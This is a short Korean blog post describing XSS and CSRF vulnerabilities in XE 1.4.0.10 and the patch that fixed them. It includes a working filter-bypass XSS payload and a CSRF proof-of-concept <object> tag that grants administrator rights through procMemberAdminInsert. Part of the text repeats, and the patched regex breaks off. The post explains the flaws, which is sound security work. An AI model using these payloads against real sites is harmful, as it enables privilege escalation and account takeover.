vulnerability
XE 1.4.0.10 XSS/CSRF 취약점
applicationlayer
2010. 4. 16. 08:46
XE개발자분들 고생이 많네요
이번에 발견된 CSRF취약점은 특정 계정을 관리자 권한으로 올릴수 있는 취약점입니다. 널루트에서 발견했고요 poc를 발표했습니다.
XSS취약점은 이벤트 태그를 차단하는 정규식에서 우회방법이 존재하는 문제였습니다.
이건 걸리지만
<img src="xxx" onload=XSS>
이건 안걸려요ㅋㅋ
<img src="xxx"onload=XSS>
그래서 이번 패치에서는 func.inc.php파일 내용이 다음과 같이 변경이 되었습니다.
이번에 발견된 CSRF취약점은 특정 계정을 관리자 권한으로 올릴수 있는 취약점입니다. 널루트에서 발견했고요 poc를 발표했습니다.
<object type="text/x-scriptlet"
data="http://test.com/xe/index.php?member_srl= 숫자&user_id=아이디&
user_name=사용자이름&nick_name=닉네임&email_address=이메일주소&
allow_mailing=Y&is_admin=Y&group_srl_list=2&module=member&act=procMemberAdminInsert"
height="0" width="0"></object>
XSS취약점은 이벤트 태그를 차단하는 정규식에서 우회방법이 존재하는 문제였습니다.
이건 걸리지만
<img src="xxx" onload=XSS>
이건 안걸려요ㅋㅋ
<img src="xxx"onload=XSS>
그래서 이번 패치에서는 func.inc.php파일 내용이 다음과 같이 변경이 되었습니다.
/(\r|\n| |\t|\"|\'|\/|\`)+on(click|........